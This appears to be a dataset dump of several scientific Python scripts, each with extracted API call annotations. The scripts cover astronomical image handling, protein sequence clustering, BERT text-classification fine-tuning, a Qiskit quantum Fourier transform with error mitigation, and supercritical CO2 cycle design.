offx=offx, offy=offy, f=f_kernel)\n', (12343, 12388), False, 'from amical.tools import apply_windowing, crop_max\n'), ((12724, 12809), 'termcolor.cprint', 'cprint', (['"""\nCropped image do not have same X, Y dimensions -> check isz"""', '"""red"""'], {}), '("""\nCropped image do not have same X, Y dimensions -> check isz""",\n \'red\')\n', (12730, 12809), False, 'from termcolor import cprint\n'), ((12935, 12977), 'amical.tools.apply_windowing', 'apply_windowing', (['img_biased'], {'window': 'window'}), '(img_biased, window=window)\n', (12950, 12977), False, 'from amical.tools import apply_windowing, crop_max\n'), ((4770, 4848), 'matplotlib.pyplot.plot', 'plt.plot', (['ind_clip', 'fluxes[ind_clip]', '"""rx"""'], {'label': '"""Rejected frames (clipping)"""'}), "(ind_clip, fluxes[ind_clip], 'rx', label='Rejected frames (clipping)')\n", (4778, 4848), True, 'from matplotlib import pyplot as plt\n'), ((5349, 5363), 'matplotlib.colors.PowerNorm', 'PowerNorm', (['(0.5)'], {}), '(0.5)\n', (5358, 5363), False, 'from matplotlib.colors import PowerNorm\n'), ((5617, 5631), 'matplotlib.colors.PowerNorm', 'PowerNorm', (['(0.5)'], {}), '(0.5)\n', (5626, 5631), False, 'from matplotlib.colors import PowerNorm\n'), ((6933, 6984), 'termcolor.cprint', 'cprint', (['"""Warning: Background not computed"""', '"""green"""'], {}), "('Warning: Background not computed', 'green')\n", (6939, 6984), False, 'from termcolor import cprint\n'), ((6997, 7076), 'termcolor.cprint', 'cprint', (['"""-> check the inner and outer radius rings (checkrad option)."""', '"""green"""'], {}), "('-> check the inner and outer radius rings (checkrad option).', 'green')\n", (7003, 7076), False, 'from termcolor import cprint\n'), ((9805, 9818), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (9811, 9818), True, 'import numpy as np\n'), ((9842, 9855), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (9848, 9855), True, 'import numpy as np\n'), ((4309, 4323), 'numpy.max', 'np.max', (['fluxes'], {}), '(fluxes)\n', (4315, 4323), True, 'import numpy as np\n'), ((4326, 4340), 'numpy.min', 'np.min', (['fluxes'], {}), '(fluxes)\n', (4332, 4340), True, 'import numpy as np\n')]
|
# Simplified Bres Maker
# Version: 1.0
#Python Version: 2.0
# IMPORTS
import pandas as pd
import numpy as np
from sklearn.cluster import KMeans
from numpy import asarray
from numpy import savetxt
import sys
import os
# DEFINITIONS
def find(s, ch):
return [i for i, ltr in enumerate(s) if ltr == ch]
# DATALOAD
#user_input = str(sys.argv[1])
#ranking = str(sys.argv[2])
#working = str(sys.argv[3])
#iterations = int(sys.argv[4])
#trys = int(sys.argv[5])
user_input = "D:/Proseeker/exampledeets.csv"
ranking = "D:/Proseeker/ranking.csv"
working = "D:/Proseeker"
iterations = 1000000
trys = 1000
aavals = pd.read_csv(ranking, usecols=['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V'],
sep =',')
d = {}
for i in range(0,544):
for j in range(0,20):
rowmin = min(aavals.iloc[i])
rowmax = max(aavals.iloc[i])
val = aavals.iloc[i, j]
aavals.replace([aavals.iloc[i, j]], (val - rowmin)/(rowmax - rowmin))
d['A'] = list(aavals['A'])
d['R'] = list(aavals['R'])
d['D'] = list(aavals['D'])
d['N'] = list(aavals['N'])
d['C'] = list(aavals['C'])
d['E'] = list(aavals['E'])
d['Q'] = list(aavals['Q'])
d['G'] = list(aavals['G'])
d['H'] = list(aavals['H'])
d['I'] = list(aavals['I'])
d['L'] = list(aavals['L'])
d['K'] = list(aavals['K'])
d['M'] = list(aavals['M'])
d['F'] = list(aavals['F'])
d['P'] = list(aavals['P'])
d['S'] = list(aavals['S'])
d['T'] = list(aavals['T'])
d['W'] = list(aavals['W'])
d['Y'] = list(aavals['Y'])
d['V'] = list(aavals['V'])
library = pd.read_csv(user_input, header=None, sep=',')
seqs = library[0]
sites = library[1]
# PROCESSING
for x in range(0, len(seqs)):
subjectstd = list(seqs[x])
subject = list.copy(subjectstd)
for p in range(0,len(subjectstd)):
subject.append(subjectstd[p])
for z in range(0, len(subject)):
if subject[z] == 'A':
subject[z] = d['A']
elif subject[z] == 'a':
subject[z] = d['A']
elif subject[z] == 'R':
subject[z] = d['R']
elif subject[z] == 'r':
subject[z] = d['R']
elif subject[z] == 'N':
subject[z] = d['N']
elif subject[z] == 'n':
subject[z] = d['N']
elif subject[z] == 'D':
subject[z] = d['D']
elif subject[z] == 'd':
subject[z] = d['D']
elif subject[z] == 'C':
subject[z] = d['C']
elif subject[z] == 'c':
subject[z] = d['C']
elif subject[z] == 'Q':
subject[z] = d['Q']
elif subject[z] == 'q':
subject[z] = d['Q']
elif subject[z] == 'E':
subject[z] = d['E']
elif subject[z] == 'e':
subject[z] = d['E']
elif subject[z] == 'G':
subject[z] = d['G']
elif subject[z] == 'g':
subject[z] = d['G']
elif subject[z] == 'H':
subject[z] = d['H']
elif subject[z] == 'h':
subject[z] = d['H']
elif subject[z] == 'I':
subject[z] = d['I']
elif subject[z] == 'i':
subject[z] = d['I']
elif subject[z] == 'L':
subject[z] = d['L']
elif subject[z] == 'l':
subject[z] = d['L']
elif subject[z] == 'K':
subject[z] = d['K']
elif subject[z] == 'k':
subject[z] = d['K']
elif subject[z] == 'M':
subject[z] = d['M']
elif subject[z] == 'm':
subject[z] = d['M']
elif subject[z] == 'F':
subject[z] = d['F']
elif subject[z] == 'f':
subject[z] = d['F']
elif subject[z] == 'P':
subject[z] = d['P']
elif subject[z] == 'p':
subject[z] = d['P']
elif subject[z] == 'S':
subject[z] = d['S']
elif subject[z] == 's':
subject[z] = d['S']
elif subject[z] == 'T':
subject[z] = d['T']
elif subject[z] == 't':
subject[z] = d['T']
elif subject[z] == 'W':
subject[z] = d['W']
elif subject[z] == 'w':
subject[z] = d['W']
elif subject[z] == 'Y':
subject[z] = d['Y']
elif subject[z] == 'y':
subject[z] = d['Y']
elif subject[z] == 'V':
subject[z] = d['V']
elif subject[z] == 'v':
subject[z] = d['V']
subjectsites = str(sites[x])
splits = find(subjectsites, ':')
splits.append(len(subjectsites))
if sum(splits) > 0:
for q in range(len(splits)):
if q == 0:
subpos = int(subjectsites[0:splits[q]])
else:
subpos = int(subjectsites[splits[q-1]+1:splits[q]])
breswindow = list((subject[subpos-6], subject[subpos-5], subject[subpos-4], subject[subpos-3],
subject[subpos-2], subject[subpos-1], subject[subpos], subject[subpos+1],
subject[subpos+2], subject[subpos+3], subject[subpos+4], subject[subpos+5],
subject[subpos+6]))
breswindow = np.column_stack(breswindow)
kmeans = KMeans(n_clusters=50, n_init=trys, max_iter=iterations, algorithm="full")
kmeans.fit(breswindow)
clusters = kmeans.labels_
breswindow = np.insert(breswindow, 13, clusters, axis=1)
savetxt(os.path.join(working, 'p{}.bres{}.csv'.format(x+1, q+1)), breswindow, delimiter=',', fmt='%f')
|
[
"sklearn.cluster.KMeans",
"numpy.insert",
"numpy.column_stack",
"pandas.read_csv"
] |
[((616, 759), 'pandas.read_csv', 'pd.read_csv', (['ranking'], {'usecols': "['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P',\n 'S', 'T', 'W', 'Y', 'V']", 'sep': '""","""'}), "(ranking, usecols=['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H',\n 'I', 'L', 'K', 'M', 'F', 'P', 'S', 'T', 'W', 'Y', 'V'], sep=',')\n", (627, 759), True, 'import pandas as pd\n'), ((1554, 1599), 'pandas.read_csv', 'pd.read_csv', (['user_input'], {'header': 'None', 'sep': '""","""'}), "(user_input, header=None, sep=',')\n", (1565, 1599), True, 'import pandas as pd\n'), ((5185, 5212), 'numpy.column_stack', 'np.column_stack', (['breswindow'], {}), '(breswindow)\n', (5200, 5212), True, 'import numpy as np\n'), ((5234, 5307), 'sklearn.cluster.KMeans', 'KMeans', ([], {'n_clusters': '(50)', 'n_init': 'trys', 'max_iter': 'iterations', 'algorithm': '"""full"""'}), "(n_clusters=50, n_init=trys, max_iter=iterations, algorithm='full')\n", (5240, 5307), False, 'from sklearn.cluster import KMeans\n'), ((5406, 5449), 'numpy.insert', 'np.insert', (['breswindow', '(13)', 'clusters'], {'axis': '(1)'}), '(breswindow, 13, clusters, axis=1)\n', (5415, 5449), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score
import torch
from transformers import TrainingArguments, Trainer
from transformers import BertTokenizer, BertForSequenceClassification
from transformers import EarlyStoppingCallback
import pdb
import argparse
import traceback
import sys
DEFAULT_MODEL_PATH="./model"
DEFAULT_OUTPUT_DIR="./output"
DEFAULT_SEQUENCE_LENGTH=512
class Dataset(torch.utils.data.Dataset):
def __init__(self, encodings, labels=None):
self.encodings = encodings
self.labels = labels
def __getitem__(self, idx):
item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}
if self.labels:
item["labels"] = torch.tensor(self.labels[idx])
return item
def __len__(self):
return len(self.encodings["input_ids"])
# Define Trainer parameters
def compute_metrics(p):
pred, labels = p
pred = np.argmax(pred, axis=1)
accuracy = accuracy_score(y_true=labels, y_pred=pred)
recall = recall_score(y_true=labels, y_pred=pred)
precision = precision_score(y_true=labels, y_pred=pred)
f1 = f1_score(y_true=labels, y_pred=pred)
return {"accuracy": accuracy, "precision": precision, "recall": recall, "f1": f1}
def fine_tune(params):
input_file = params.input
model_name_or_path = params.model
output_dir = params.output
paired = params.paired
seq_length = params.seq_length
# Read data
#data = pd.read_csv("data/tokenized_train.csv",sep='\t')
data = pd.read_csv(input_file,sep='\t')
# Define pretrained tokenizer and model
#model_name = "bert-large-cased"
model_name = model_name_or_path
tokenizer = BertTokenizer.from_pretrained(model_name)
model = BertForSequenceClassification.from_pretrained(model_name, num_labels=2)
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
model.to(device)
# ----- 1. Preprocess data -----#
# Preprocess data
if (paired):
X1 = list(data["text1"])
X2 = list(data["text2"])
assert(len(X1) == len(X2))
X = []
for i in range(len(X1)):
X.append(X1[i] + '\t' + X2[i])
else:
X = list(data["text"])
y = list(data["label"])
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.01)
if (paired):
X1 = []
X2 = []
for i in range(len(X_train)):
arr = X_train[i].split('\t')
assert(len(arr) == 2)
X1.append(arr[0])
X2.append(arr[1])
#pdb.set_trace()
X_train_tokenized = tokenizer(text=X1, text_pair = X2, padding=True, truncation=True, max_length=seq_length)
else:
X_train_tokenized = tokenizer(X_train, padding=True, truncation=True, max_length=seq_length)
if (paired):
X1 = []
X2 = []
for i in range(len(X_val)):
arr = X_val[i].split('\t')
assert(len(arr) == 2)
X1.append(arr[0])
X2.append(arr[1])
X_val_tokenized = tokenizer(text = X1, text_pair = X2, padding=True, truncation=True, max_length=seq_length)
else:
X_val_tokenized = tokenizer(X_val, padding=True, truncation=True, max_length=seq_length)
# Create torch dataset
train_dataset = Dataset(X_train_tokenized, y_train)
val_dataset = Dataset(X_val_tokenized, y_val)
# ----- 2. Fine-tune pretrained model -----#
# Define Trainer
args = TrainingArguments(
output_dir=output_dir,
evaluation_strategy="steps",
eval_steps=100,
save_steps=100,
warmup_steps=500,
per_device_train_batch_size=32,
per_device_eval_batch_size=32,
#learning_rate = 1e-5,
num_train_epochs=5,
#weight_decay=0.01,
seed=0,
load_best_model_at_end=True,
logging_dir='./logs', # directory for storing logs
logging_steps=10,
metric_for_best_model="accuracy"
)
trainer = Trainer(
model=model,
args=args,
train_dataset=train_dataset,
eval_dataset=val_dataset,
compute_metrics=compute_metrics,
#callbacks=[EarlyStoppingCallback(early_stopping_patience=3)],
)
# Train pre-trained model
trainer.train()
trainer.save_model(output_dir)
print("Model saved. Training complete")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Fine tune model ',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-model', action="store", dest="model", default=DEFAULT_MODEL_PATH,help='BERT pretrained models, or custom model path')
parser.add_argument('-input', action="store", dest="input",required=True, help='Input train data file')
parser.add_argument('-output', action="store", dest="output",default=DEFAULT_OUTPUT_DIR, help='Output directory where model is saved')
parser.add_argument('-seq_length', action="store", dest="seq_length",type=int,default=DEFAULT_SEQUENCE_LENGTH, help='Default max sequence length of input')
parser.add_argument('-paired', dest="paired", action='store_true',help='Input is expected to be **pairs** of sentences')
parser.add_argument('-no-paired', dest="paired", action='store_false',help='Input is expected to be **single** sentence - not pairs of sentences')
parser.set_defaults(paired=False)
results = parser.parse_args()
try:
torch.cuda.empty_cache()
fine_tune(results)
except:
print("Unexpected error:", sys.exc_info()[0])
traceback.print_exc(file=sys.stdout)
|
[
"sklearn.metrics.f1_score",
"pandas.read_csv",
"transformers.TrainingArguments",
"sklearn.model_selection.train_test_split",
"argparse.ArgumentParser",
"transformers.BertTokenizer.from_pretrained",
"numpy.argmax",
"sklearn.metrics.precision_score",
"sklearn.metrics.recall_score",
"torch.tensor",
"sys.exc_info",
"transformers.BertForSequenceClassification.from_pretrained",
"torch.cuda.is_available",
"torch.cuda.empty_cache",
"traceback.print_exc",
"transformers.Trainer",
"sklearn.metrics.accuracy_score",
"torch.device"
] |
[((1036, 1059), 'numpy.argmax', 'np.argmax', (['pred'], {'axis': '(1)'}), '(pred, axis=1)\n', (1045, 1059), True, 'import numpy as np\n'), ((1076, 1118), 'sklearn.metrics.accuracy_score', 'accuracy_score', ([], {'y_true': 'labels', 'y_pred': 'pred'}), '(y_true=labels, y_pred=pred)\n', (1090, 1118), False, 'from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\n'), ((1132, 1172), 'sklearn.metrics.recall_score', 'recall_score', ([], {'y_true': 'labels', 'y_pred': 'pred'}), '(y_true=labels, y_pred=pred)\n', (1144, 1172), False, 'from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\n'), ((1189, 1232), 'sklearn.metrics.precision_score', 'precision_score', ([], {'y_true': 'labels', 'y_pred': 'pred'}), '(y_true=labels, y_pred=pred)\n', (1204, 1232), False, 'from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\n'), ((1242, 1278), 'sklearn.metrics.f1_score', 'f1_score', ([], {'y_true': 'labels', 'y_pred': 'pred'}), '(y_true=labels, y_pred=pred)\n', (1250, 1278), False, 'from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\n'), ((1640, 1673), 'pandas.read_csv', 'pd.read_csv', (['input_file'], {'sep': '"""\t"""'}), "(input_file, sep='\\t')\n", (1651, 1673), True, 'import pandas as pd\n'), ((1807, 1848), 'transformers.BertTokenizer.from_pretrained', 'BertTokenizer.from_pretrained', (['model_name'], {}), '(model_name)\n', (1836, 1848), False, 'from transformers import BertTokenizer, BertForSequenceClassification\n'), ((1861, 1932), 'transformers.BertForSequenceClassification.from_pretrained', 'BertForSequenceClassification.from_pretrained', (['model_name'], {'num_labels': '(2)'}), '(model_name, num_labels=2)\n', (1906, 1932), False, 'from transformers import BertTokenizer, BertForSequenceClassification\n'), ((2422, 2460), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.01)'}), '(X, y, test_size=0.01)\n', (2438, 2460), False, 'from sklearn.model_selection import train_test_split\n'), ((3594, 3924), 'transformers.TrainingArguments', 'TrainingArguments', ([], {'output_dir': 'output_dir', 'evaluation_strategy': '"""steps"""', 'eval_steps': '(100)', 'save_steps': '(100)', 'warmup_steps': '(500)', 'per_device_train_batch_size': '(32)', 'per_device_eval_batch_size': '(32)', 'num_train_epochs': '(5)', 'seed': '(0)', 'load_best_model_at_end': '(True)', 'logging_dir': '"""./logs"""', 'logging_steps': '(10)', 'metric_for_best_model': '"""accuracy"""'}), "(output_dir=output_dir, evaluation_strategy='steps',\n eval_steps=100, save_steps=100, warmup_steps=500,\n per_device_train_batch_size=32, per_device_eval_batch_size=32,\n num_train_epochs=5, seed=0, load_best_model_at_end=True, logging_dir=\n './logs', logging_steps=10, metric_for_best_model='accuracy')\n", (3611, 3924), False, 'from transformers import TrainingArguments, Trainer\n'), ((4149, 4273), 'transformers.Trainer', 'Trainer', ([], {'model': 'model', 'args': 'args', 'train_dataset': 'train_dataset', 'eval_dataset': 'val_dataset', 'compute_metrics': 'compute_metrics'}), '(model=model, args=args, train_dataset=train_dataset, eval_dataset=\n val_dataset, compute_metrics=compute_metrics)\n', (4156, 4273), False, 'from transformers import TrainingArguments, Trainer\n'), ((4562, 4678), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Fine tune model """', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description='Fine tune model ', formatter_class=\n argparse.ArgumentDefaultsHelpFormatter)\n", (4585, 4678), False, 'import argparse\n'), ((1970, 1995), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1993, 1995), False, 'import torch\n'), ((1946, 1966), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (1958, 1966), False, 'import torch\n'), ((2001, 2020), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (2013, 2020), False, 'import torch\n'), ((5590, 5614), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (5612, 5614), False, 'import torch\n'), ((711, 733), 'torch.tensor', 'torch.tensor', (['val[idx]'], {}), '(val[idx])\n', (723, 733), False, 'import torch\n'), ((827, 857), 'torch.tensor', 'torch.tensor', (['self.labels[idx]'], {}), '(self.labels[idx])\n', (839, 857), False, 'import torch\n'), ((5716, 5752), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (5735, 5752), False, 'import traceback\n'), ((5689, 5703), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5701, 5703), False, 'import sys\n')]
|
from qft import get_fft_from_counts, loadBackend, qft_framework
from fft import fft_framework
from frontend import frontend, signal, transform
from qiskit.circuit.library import QFT as qiskit_qft
# --- Standard imports
# Importing standard Qiskit libraries and configuring account
from qiskit import QuantumCircuit, execute, Aer, IBMQ
from qiskit.compiler import transpile, assemble
from qiskit.tools.jupyter import *
from qiskit.visualization import *
# Loading your IBM Q account(s)
provider = IBMQ.load_account()
# --- Imports
from qiskit import QuantumCircuit, execute, BasicAer
from qiskit.tools.monitor import job_monitor
import math
from numpy import linalg as LA
import numpy as np
#%config jupy = 'svg' # Makes the images look nice
# --- Computation of the calibration matrix
from qiskit.ignis.mitigation.measurement import (complete_meas_cal,CompleteMeasFitter)
from qiskit import *
nQubits = 4
nShots = 2048
qr = QuantumRegister(nQubits)
meas_calibs, state_labels = complete_meas_cal(qr=qr, circlabel='mcal')
_, backend = loadBackend('ibmq_quito', True)
job = execute(meas_calibs, backend=backend, shots=1000)
# job_monitor(job, interval = 3)
cal_results = job.result()
meas_fitter = CompleteMeasFitter(cal_results, state_labels, circlabel='mcal')
print(meas_fitter.cal_matrix)
q = QuantumRegister(4,'q')
qc = QuantumCircuit(q)
# Normalize ampl, which is required for squared sum of amps=1
ys = signal(samplingRate=1000, amplification=1, duration=0, nSamples=2**nQubits)
ys.addFrequency(125)
ys.addFrequency(250)
y = ys.sample()
plotData = ys.show(subplot=[1,4,1], title='signal')
print("Processing FFT")
fft = transform(fft_framework)
y_hat, f = fft.forward(ys)
y_hat_ideal_p, f_p = fft.postProcess(y_hat, f)
plotData = fft.show(y_hat_ideal_p, f_p, subplot=[1,4,2], title="FFT (ref)")
# y.addFrequency(250)
ampls = y / np.linalg.norm(y)
# for 2^n amplitudes, we have n qubits for initialization
# this means that the binary representation happens exactly here
qc.initialize(ampls, [q[i] for i in range(nQubits)])
qc += qiskit_qft(num_qubits=nQubits, approximation_degree=0, do_swaps=True, inverse=False, insert_barriers=False, name='qft')
qc.measure_all()
qc = transpile(qc, backend, optimization_level=1) # opt level 0,1..3. 3: heaviest opt
job = execute(qc, backend, shots = nShots)
#job = execute(qc, BasicAer.get_backend('qasm_simulator'), shots = shots)
result = job.result()
# print(result.get_counts())
genTransform = transform(None)
y_hat = np.array(get_fft_from_counts(result.get_counts(), nQubits))
f = genTransform.calcFreqArray(ys, y_hat)
y_hat_sim_p, f_p = genTransform.postProcess(y_hat, f)
plotData = genTransform.show(y_hat_sim_p, f_p, subplot=[1,4,3], title=f"qft_sim_n")
print(y_hat)
# Get the filter object
meas_filter = meas_fitter.filter
# Results with mitigation
mitigated_results = meas_filter.apply(result)
mitigated_counts = mitigated_results.get_counts(0)
# print(mitigated_counts)
y_hat = np.array(get_fft_from_counts(mitigated_counts, nQubits))
f = genTransform.calcFreqArray(ys, y_hat)
y_hat_sim_p, f_p = genTransform.postProcess(y_hat, f)
plotData = genTransform.show(y_hat_sim_p, f_p, subplot=[1,4,4], title=f"qft_sim_n_f")
print(y_hat)
frontend.primeTime()
|
[
"frontend.signal",
"qiskit.execute",
"qiskit.compiler.transpile",
"qft.loadBackend",
"qiskit.ignis.mitigation.measurement.complete_meas_cal",
"qiskit.IBMQ.load_account",
"qiskit.circuit.library.QFT",
"frontend.transform",
"numpy.linalg.norm",
"qiskit.QuantumCircuit",
"qft.get_fft_from_counts",
"qiskit.ignis.mitigation.measurement.CompleteMeasFitter",
"frontend.frontend.primeTime"
] |
[((499, 518), 'qiskit.IBMQ.load_account', 'IBMQ.load_account', ([], {}), '()\n', (516, 518), False, 'from qiskit import QuantumCircuit, execute, Aer, IBMQ\n'), ((997, 1039), 'qiskit.ignis.mitigation.measurement.complete_meas_cal', 'complete_meas_cal', ([], {'qr': 'qr', 'circlabel': '"""mcal"""'}), "(qr=qr, circlabel='mcal')\n", (1014, 1039), False, 'from qiskit.ignis.mitigation.measurement import complete_meas_cal, CompleteMeasFitter\n'), ((1053, 1084), 'qft.loadBackend', 'loadBackend', (['"""ibmq_quito"""', '(True)'], {}), "('ibmq_quito', True)\n", (1064, 1084), False, 'from qft import get_fft_from_counts, loadBackend, qft_framework\n'), ((1091, 1140), 'qiskit.execute', 'execute', (['meas_calibs'], {'backend': 'backend', 'shots': '(1000)'}), '(meas_calibs, backend=backend, shots=1000)\n', (1098, 1140), False, 'from qiskit import QuantumCircuit, execute, BasicAer\n'), ((1216, 1279), 'qiskit.ignis.mitigation.measurement.CompleteMeasFitter', 'CompleteMeasFitter', (['cal_results', 'state_labels'], {'circlabel': '"""mcal"""'}), "(cal_results, state_labels, circlabel='mcal')\n", (1234, 1279), False, 'from qiskit.ignis.mitigation.measurement import complete_meas_cal, CompleteMeasFitter\n'), ((1350, 1367), 'qiskit.QuantumCircuit', 'QuantumCircuit', (['q'], {}), '(q)\n', (1364, 1367), False, 'from qiskit import QuantumCircuit, execute, BasicAer\n'), ((1435, 1512), 'frontend.signal', 'signal', ([], {'samplingRate': '(1000)', 'amplification': '(1)', 'duration': '(0)', 'nSamples': '(2 ** nQubits)'}), '(samplingRate=1000, amplification=1, duration=0, nSamples=2 ** nQubits)\n', (1441, 1512), False, 'from frontend import frontend, signal, transform\n'), ((1655, 1679), 'frontend.transform', 'transform', (['fft_framework'], {}), '(fft_framework)\n', (1664, 1679), False, 'from frontend import frontend, signal, transform\n'), ((2071, 2194), 'qiskit.circuit.library.QFT', 'qiskit_qft', ([], {'num_qubits': 'nQubits', 'approximation_degree': '(0)', 'do_swaps': '(True)', 'inverse': '(False)', 'insert_barriers': '(False)', 'name': '"""qft"""'}), "(num_qubits=nQubits, approximation_degree=0, do_swaps=True,\n inverse=False, insert_barriers=False, name='qft')\n", (2081, 2194), True, 'from qiskit.circuit.library import QFT as qiskit_qft\n'), ((2214, 2258), 'qiskit.compiler.transpile', 'transpile', (['qc', 'backend'], {'optimization_level': '(1)'}), '(qc, backend, optimization_level=1)\n', (2223, 2258), False, 'from qiskit.compiler import transpile, assemble\n'), ((2301, 2335), 'qiskit.execute', 'execute', (['qc', 'backend'], {'shots': 'nShots'}), '(qc, backend, shots=nShots)\n', (2308, 2335), False, 'from qiskit import QuantumCircuit, execute, BasicAer\n'), ((2484, 2499), 'frontend.transform', 'transform', (['None'], {}), '(None)\n', (2493, 2499), False, 'from frontend import frontend, signal, transform\n'), ((3250, 3270), 'frontend.frontend.primeTime', 'frontend.primeTime', ([], {}), '()\n', (3268, 3270), False, 'from frontend import frontend, signal, transform\n'), ((1868, 1885), 'numpy.linalg.norm', 'np.linalg.norm', (['y'], {}), '(y)\n', (1882, 1885), True, 'import numpy as np\n'), ((3004, 3050), 'qft.get_fft_from_counts', 'get_fft_from_counts', (['mitigated_counts', 'nQubits'], {}), '(mitigated_counts, nQubits)\n', (3023, 3050), False, 'from qft import get_fft_from_counts, loadBackend, qft_framework\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 9 10:56:12 2017
@author: tneises
"""
import json
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.lines as mlines
import sys
import os
absFilePath = os.path.abspath(__file__)
fileDir = os.path.dirname(os.path.abspath(__file__))
parentDir = os.path.dirname(fileDir)
newPath = os.path.join(parentDir, 'core')
sys.path.append(newPath)
import sco2_cycle_ssc as sco2_solve
import sco2_plots as cy_plt
##########################################
"Cycle design simulation with default parameters"
c_sco2 = sco2_solve.C_sco2_sim(1) # Initialize to the recompression cycle default (1)
c_sco2.solve_sco2_case() # Run design simulation
print(c_sco2.m_solve_dict)
print("\nDid the simulation code solve successfully = ",c_sco2.m_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_solve_dict("design_solution__default_pars") # Save design solution dictionary
sol_dict__default_pars = c_sco2.m_solve_dict
##########################################
"Plotting a cycle design"
c_plot = cy_plt.C_sco2_TS_PH_plot(sol_dict__default_pars)
c_plot.is_save_plot = True
c_plot.file_name = "cycle_design_plots__default_pars"
c_plot.plot_new_figure()
##########################################
"Modifying the cycle design parameters"
mod_base_dict = {"T_htf_hot_des" : 620, "cycle_config" : 2}
c_sco2.overwrite_des_par_base(mod_base_dict) # Overwrite baseline design parameters
c_sco2.solve_sco2_case() # Run design simulation
print(c_sco2.m_solve_dict)
print("\nDid the simulation code with"
"modified design parameters solve successfully = ",c_sco2.m_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_solve_dict("design_solution__modified_pars") # Save design solution dictionary
sol_dict__mod_pars = c_sco2.m_solve_dict
##########################################
"Comparing two cycle designs"
c_comp_plot = cy_plt.C_sco2_TS_PH_overlay_plot(sol_dict__default_pars, sol_dict__mod_pars)
c_comp_plot.is_save_plot = True
c_comp_plot.plot_new_figure()
##########################################
"Running a parametric study on one design parameter"
c_sco2.reset_des_par_base_to_default_RC()
T_HTF_in_par_list = list(np.arange(570,721,25))
T_HTF_in_par_dict_list = []
for T_HTF_in in T_HTF_in_par_list:
T_HTF_in_par_dict_list.append({"T_htf_hot_des" : T_HTF_in})
c_sco2.solve_sco2_parametric(T_HTF_in_par_dict_list)
print("\nDid the parametric analyses solve successfully = ",c_sco2.m_par_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_par_solve_dict("T_HTF_parametric")
sol_dict_parametric = c_sco2.m_par_solve_dict
##########################################
"Plotting a 1D parametric study"
par_plot = cy_plt.C_des_stacked_outputs_plot([sol_dict_parametric])
par_plot.x_var = "T_HTF"
par_plot.y_vars = ["eta","MC_P_in","PHX_dT"]
par_plot.is_legend = False
par_plot.max_rows = 2
par_plot.is_save = True;
par_plot.file_name = "T_HTF_par_plot"
par_plot.create_plot()
##########################################
"Plotting one cycle design from a parametric solution dictionary"
i_plot = len(sol_dict_parametric["T_htf_hot_des"]) - 1
dict_i_plot = sco2_solve.get_one_des_dict_from_par_des_dict(sol_dict_parametric, "T_htf_hot_des", i_plot)
c_i_cycle_plot = cy_plt.C_sco2_TS_PH_plot(dict_i_plot)
c_i_cycle_plot.is_save_plot = True
c_i_cycle_plot.file_name = "cycle_design_plots__T_HTF_hottest"
c_i_cycle_plot.plot_new_figure()
##########################################
##########################################
##########################################
##########################################
##########################################
|
[
"sco2_plots.C_sco2_TS_PH_overlay_plot",
"sco2_plots.C_sco2_TS_PH_plot",
"os.path.join",
"os.path.dirname",
"sco2_cycle_ssc.C_sco2_sim",
"sco2_plots.C_des_stacked_outputs_plot",
"sco2_cycle_ssc.get_one_des_dict_from_par_des_dict",
"os.path.abspath",
"sys.path.append",
"numpy.arange"
] |
[((223, 248), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (238, 248), False, 'import os\n'), ((314, 338), 'os.path.dirname', 'os.path.dirname', (['fileDir'], {}), '(fileDir)\n', (329, 338), False, 'import os\n'), ((349, 380), 'os.path.join', 'os.path.join', (['parentDir', '"""core"""'], {}), "(parentDir, 'core')\n", (361, 380), False, 'import os\n'), ((382, 406), 'sys.path.append', 'sys.path.append', (['newPath'], {}), '(newPath)\n', (397, 406), False, 'import sys\n'), ((578, 602), 'sco2_cycle_ssc.C_sco2_sim', 'sco2_solve.C_sco2_sim', (['(1)'], {}), '(1)\n', (599, 602), True, 'import sco2_cycle_ssc as sco2_solve\n'), ((1072, 1120), 'sco2_plots.C_sco2_TS_PH_plot', 'cy_plt.C_sco2_TS_PH_plot', (['sol_dict__default_pars'], {}), '(sol_dict__default_pars)\n', (1096, 1120), True, 'import sco2_plots as cy_plt\n'), ((1920, 1996), 'sco2_plots.C_sco2_TS_PH_overlay_plot', 'cy_plt.C_sco2_TS_PH_overlay_plot', (['sol_dict__default_pars', 'sol_dict__mod_pars'], {}), '(sol_dict__default_pars, sol_dict__mod_pars)\n', (1952, 1996), True, 'import sco2_plots as cy_plt\n'), ((2727, 2783), 'sco2_plots.C_des_stacked_outputs_plot', 'cy_plt.C_des_stacked_outputs_plot', (['[sol_dict_parametric]'], {}), '([sol_dict_parametric])\n', (2760, 2783), True, 'import sco2_plots as 